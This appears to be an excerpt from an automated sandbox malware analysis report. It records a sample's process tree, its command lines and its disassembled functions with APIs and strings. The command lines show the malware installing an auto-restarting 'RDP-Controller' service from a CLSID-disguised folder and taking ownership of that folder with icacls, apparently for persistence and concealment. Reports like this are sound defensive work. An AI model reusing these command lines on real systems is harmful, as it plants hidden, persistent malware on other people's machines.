Commandline:	sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Imagebase:	0x7ff734ee0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Imagebase:	0x7ff734ee0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe start RDP-Controller
Imagebase:	0x7ff734ee0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff6ef650000
File size:	89'088 bytes
MD5 hash:	4E320E2F46342D6D4657D2ADBF1F22D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	11:46:28
Start date:	24/09/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Imagebase:	0x7ff670060000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:46:28
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:46:28
Start date:	24/09/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Imagebase:	0x7ff670060000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:46:28
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 02F99CFA Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9A057
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9A05D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9A063

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5cd11c8f57aefbf4e978efb23c97d87aadef05c6180bfc30900a697b6c4ed259
Instruction ID: 47a8011b9baca9e957fdbe00d26b5bf9dfd56ce943fe01651778f1a281f401d1
Opcode Fuzzy Hash: 5cd11c8f57aefbf4e978efb23c97d87aadef05c6180bfc30900a697b6c4ed259
Instruction Fuzzy Hash: 82B18070918A4C8FEB54EF28C884A9EB7E1FFA9394F60571EE54AD3164DB709481CB41

Function 02F9CDAA Relevance: 3.3, APIs: 2, Instructions: 338COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9D0EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9D0F5

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 94a887f789ff5ddcb093f0301a886daf5772482d6b96eb020e294c1a36146a2d
Instruction ID: dcecd1a22865e6893c6243a004f09c5fca52bbae17441cc31e08f7cf3272cd21
Opcode Fuzzy Hash: 94a887f789ff5ddcb093f0301a886daf5772482d6b96eb020e294c1a36146a2d
Instruction Fuzzy Hash: 4AA19071928B4C8BEB54EF2CC8846EE77E2FB99390F50471AE58AC3164DB309581CB81

Function 02F94B4E Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d789b65366662fea0c61f3f853abc17da2fc7c830dcada29da3dc287b9a8088
Instruction ID: 54dadb8c6306fbfb6263cc3088dafa51ed08ca6200f34381fe6ea2c5dec0dac4
Opcode Fuzzy Hash: 6d789b65366662fea0c61f3f853abc17da2fc7c830dcada29da3dc287b9a8088
Instruction Fuzzy Hash: A7A1A331A18E0C8FDF58EF2CC485AADB7E1FBA9354F00465AD54AD7150DA30E986CB85

Function 02FAD122 Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 02FAD371

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
Instruction ID: 97233797a5aaf65522aeac158ba121f320760d361d626a96a2fc6dbd2fec569d
Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
Instruction Fuzzy Hash: D8B18AB1610B4D8FDB98DF1CC89AB6677E0FF49348F188599E859CB661C335E852CB01

Function 02F97F32 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e702905e188292895ab496ef014bc760e695e081b65edb76e1e23856c507ca6b
Instruction ID: af240bd9ade00c423d80f3a0b9e13cd6cc084c0ac731a66ba183370069a924eb
Opcode Fuzzy Hash: e702905e188292895ab496ef014bc760e695e081b65edb76e1e23856c507ca6b
Instruction Fuzzy Hash: 95E19531928B8C8BDB49DF28C8945BAB3E1FFA9340F50571EE586D3154EB74E684CB81

Function 02FA701E Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
Instruction ID: a3554e579c0a96457e7f67de533db03c79da4d5bbc406b8508169e21e9d48f5c
Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
Instruction Fuzzy Hash: DD6116B0E1CB5C4FDB28FF689C5956EBBE1EB84B50F04465FE586C3155DB30A8428AC2

Function 02FA53EA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
Instruction ID: fa07497f0f0fceb977695c2690035f394bc0520c4bb3ae46eb7e02e20d5c0366
Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
Instruction Fuzzy Hash: 4D512432718E0C8F8B0CDE6CD8A867573D2E7AC314315832EE50ED7265DA70E8468781

Function 02F960D2 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction ID: f1225bdbb7c3d8146eb9cbef5154bfbffc05a0fd55b158ad910b18772e530a96
Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction Fuzzy Hash: ED219831B116054BE70CCE2EC899575B3D6F7D9205B54C67DE15BCB357C93658038A48

Function 02F95B42 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction ID: 880e33488e1a229cfef6b273fb01b96636e3d486ccacc26ba29b63c651d92901
Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction Fuzzy Hash: 4211E1723108048FEB4CCF7DCD8966973D6EB89304B58C2BCE61ACB2AAD6358903C744

Function 02FA0D62 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02FA0DBF

Part of subcall function 02FA3122: __GetUnwindTryBlock.LIBCMT ref: 02FA3165
Part of subcall function 02FA3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02FA318A

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02FA0E97
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02FA10E5
std::bad_alloc::bad_alloc.LIBCMT ref: 02FA11F2

Strings

csm, xrefs: 02FA0EBA
csm, xrefs: 02FA0E40
csm, xrefs: 02FA0DD9

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
Instruction ID: d6b7d180f78bf54f75052171eb29356a25cef84d206d3f8b026c0bec0508665d
Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
Instruction Fuzzy Hash: 5BE1E370918B488FEF24EF68D8A57AE77E1FB98394F50021ED589D7211DB34E481CB82

Function 02FA1232 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02FA13D0
std::bad_alloc::bad_alloc.LIBCMT ref: 02FA16F9

Strings

csm, xrefs: 02FA1317
csm, xrefs: 02FA1379
csm, xrefs: 02FA13F7

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
Instruction ID: 7e148f22ebed8aedb1457cd0190fb3b7a60939b6efa33d96882996453d72194c
Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
Instruction Fuzzy Hash: 4BE10770918B488FDB14EF28C8A46AE77E1FF59394F15025ED589C7652DB30E482CF82

Function 02FA0632 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 02FA0755
__AdjustPointer.LIBCMT ref: 02FA07A0

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
Instruction ID: 4e5f5aecba5e2c40a69d38534e01cbac7dd7875701361e69b91bf2a0ca5471f9
Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
Instruction Fuzzy Hash: 69C1D071918E0E8FAB29AF1CA460775B3D1FF98794B54462EC68AC3255EF70D881CB80

Function 02F9A416 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

2, xrefs: 02F9A66B
`, xrefs: 02F9A4B7
(, xrefs: 02F9A6CA
H, xrefs: 02F9A6B4
, xrefs: 02F9A676
P!`, xrefs: 02F9A71E

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID:
String ID: $($2$H$P!`$`
API String ID: 0-2682688576
Opcode ID: f3333863e6a630afb4b2bbe1aa5c2ac1bf4f02da6f8d2e8a3d59ac9fb3e9e479
Instruction ID: 680d62f8be82c68abda8f51f05ac1394f207ad5207c5145a65557a42f2e7ce46
Opcode Fuzzy Hash: f3333863e6a630afb4b2bbe1aa5c2ac1bf4f02da6f8d2e8a3d59ac9fb3e9e479
Instruction Fuzzy Hash: FCC1F5B09087888FD7A4EF18C48879ABBE1FB99314F504A6ED8CDCB215DB705589CF46

Function 02FA19A6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02FA1A61

Strings

RCC, xrefs: 02FA1A32
MOC, xrefs: 02FA1A2A

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
Instruction ID: 592556a8f2131a2557d0adc41d92165d6d57ddb5659268d9be57225fc82deea0
Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
Instruction Fuzzy Hash: 0AA1D570918B488FDB18EF6CC895AADBBF1FB98344F14465EE58AC7121DB34E581CB81

Function 02FA006A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02FA0095
_IsNonwritableInCurrentImage.LIBCMT ref: 02FA012C

Strings

csm, xrefs: 02FA0113

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
Instruction ID: 482a78a91f1ac04973a5a85449cb95df4af7f56e20a76791db32b5dab8261d52
Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
Instruction Fuzzy Hash: CD61D670718B088BDF28EE1CE8A5B7473D5FB54394F10416DEA8AC3256EF34E8518B85

Function 02FA1736 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02FA17E1

Strings

MOC, xrefs: 02FA17A9
RCC, xrefs: 02FA17B1

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
Instruction ID: c3b80d0d5fa7dc0119d0ee2d606db49c4d8a75d26e7e3954128fa0a15e4ecaf6
Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
Instruction Fuzzy Hash: B671BD70918B488FDB28EF1CC456BAAB7E0FB99344F444A5EE58DC3211DB74E581CB82

Function 02FA27F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02FA28A0
_CreateFrameInfo.LIBVCRUNTIME ref: 02FA28C9

Strings

csm, xrefs: 02FA29C9

Memory Dump Source

Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_file.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction ID: 0b1daf2b00b2293c4f46cc3cfbcadeb52e519b6117a829f38135a8d86cacf9f8
Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction Fuzzy Hash: 275143B0618B448FD764EF28D4A576977E2FB8D391F10065EE589C7621DB30E441CF86

Analysis Process: file.exePID: 6728, Parent PID: 552COMMON

Execution Graph

Execution Coverage:	59.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02E501B0 Relevance: 9.3, APIs: 6, Instructions: 317
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02E50215
VirtualProtect.KERNELBASE ref: 02E50301
VirtualFree.KERNELBASE ref: 02E50332
VirtualFree.KERNELBASE ref: 02E50358
VirtualAlloc.KERNELBASE ref: 02E5037B
VirtualProtect.KERNELBASE ref: 02E5051B

Memory Dump Source

Source File: 00000001.00000002.2976788650.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e50000_file.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction ID: 2a2e062aa948e3b74c15e76abbff9e5eb8e303faed4d188265df2c8eeb0229fc
Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction Fuzzy Hash: 85C1DA3421CA488FD784EF5CD498B6AB7E1FB98305F51585DF48AC7261DBB4E881CB02

Function 02E50620 Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02E5063A

Memory Dump Source

Source File: 00000001.00000002.2976788650.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e50000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

Analysis Process: 3lp16vmh8u8y3z1y6.exePID: 5432, Parent PID: 6728COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8%
Total number of Nodes:	1734
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF73AFB8CFC Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 281
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF73AFB9BB9: strcmp.MSVCRT ref: 00007FF73AFB9CAD

Part of subcall function 00007FF73AFB1CF4: LoadLibraryA.KERNEL32 ref: 00007FF73AFB1D02

FreeLibrary.KERNEL32 ref: 00007FF73AFB8DAC

Part of subcall function 00007FF73AFB1C73: GetProcAddress.KERNEL32 ref: 00007FF73AFB1C93

strlen.MSVCRT ref: 00007FF73AFB8EEF
GetProcessHeap.KERNEL32 ref: 00007FF73AFB8F6B
HeapAlloc.KERNEL32 ref: 00007FF73AFB8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF73AFB9010

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF73AFB905D
GetProcessHeap.KERNEL32 ref: 00007FF73AFB90F2
HeapFree.KERNEL32 ref: 00007FF73AFB9103
LocalFree.KERNEL32 ref: 00007FF73AFB91E4

Part of subcall function 00007FF73AFB14E2: EnterCriticalSection.KERNEL32 ref: 00007FF73AFB15B3
Part of subcall function 00007FF73AFB14E2: LeaveCriticalSection.KERNEL32 ref: 00007FF73AFB15DB
Part of subcall function 00007FF73AFB14E2: CopyFileA.KERNEL32 ref: 00007FF73AFB1638

Strings

[I] (%s) -> Done(svc_name=%s), xrefs: 00007FF73AFB91F9
RtlFreeUnicodeString, xrefs: 00007FF73AFB8DD4
block_svc, xrefs: 00007FF73AFB8E31, 00007FF73AFB8E4B, 00007FF73AFB9070, 00007FF73AFB90CC, 00007FF73AFB91F2
svc, xrefs: 00007FF73AFB8D2C
RtlCopyMemory, xrefs: 00007FF73AFB8E09
RtlAnsiStringToUnicodeString, xrefs: 00007FF73AFB8D73
mem_alloc, xrefs: 00007FF73AFB90AC
[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx), xrefs: 00007FF73AFB8E38
[E] (%s) -> RtlCreateServiceSid failed(res=%08lx), xrefs: 00007FF73AFB8E52, 00007FF73AFB90D3
RtlZeroMemory, xrefs: 00007FF73AFB8DF1
RtlCreateServiceSid, xrefs: 00007FF73AFB8DB7
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF73AFB9077
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF73AFB90B3
ntdll.dll, xrefs: 00007FF73AFB8D5F

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
API String ID: 3039259412-1782951725
Opcode ID: f6c01cc81a6204911dc953d5d1d2a92a17cb2aa6101d68be7ffc53fd14f333aa
Instruction ID: 2f195d420a6f78bd84ced93363a329f5ef06466c8bdcabfc42c2a4cf2cccb00b
Opcode Fuzzy Hash: f6c01cc81a6204911dc953d5d1d2a92a17cb2aa6101d68be7ffc53fd14f333aa
Instruction Fuzzy Hash: A2D16129A0C783A1FB60AB51E4823B9E360FF84384F904472DA8D47795DF7DE985E760

Function 00007FF73AFB855D Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 393COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AFB9BB9: strcmp.MSVCRT ref: 00007FF73AFB9CAD

Process32Next.KERNEL32 ref: 00007FF73AFB8671
GetLastError.KERNEL32 ref: 00007FF73AFB867D
GetLastError.KERNEL32 ref: 00007FF73AFB86C1
GetLastError.KERNEL32 ref: 00007FF73AFB87A3
OpenProcess.KERNEL32 ref: 00007FF73AFB88DC
QueryFullProcessImageNameW.KERNEL32 ref: 00007FF73AFB8920
GetLastError.KERNEL32 ref: 00007FF73AFB892E
CloseHandle.KERNEL32 ref: 00007FF73AFB8CA8

Strings

